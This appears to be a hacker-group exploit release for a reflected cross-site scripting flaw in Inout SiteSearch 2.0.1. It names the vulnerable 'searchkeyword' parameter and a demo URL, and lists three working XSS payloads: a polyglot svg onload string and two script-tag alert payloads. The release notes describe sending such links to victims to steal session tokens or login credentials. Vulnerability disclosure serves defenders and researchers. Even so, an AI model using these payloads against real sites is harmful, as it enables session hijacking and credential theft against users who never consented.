Authored by CraCkEr

Inout SiteSearch version 2.0.1 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : inoutscripts.com │ │ │
│ Vendor : Inout Scripts │ │ │
│ Software : Inout SiteSearch 2.0.1 │ │ Inout SiteSearch is a premium script │
│ Vuln Type: Cross Site Scripting Reflected │ │ that allows you to add a site │
│ Method : GET │ │ search feature │
│ Impact : Manipulate the content of │ │ │
│ the site │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

GET parameter 'searchkeyword' is vulnerable to XSS

http://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]


Some XSS Payloads Reflected

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

</TITLE><SCRIPT>alert("XSS");</SCRIPT>



[-] Done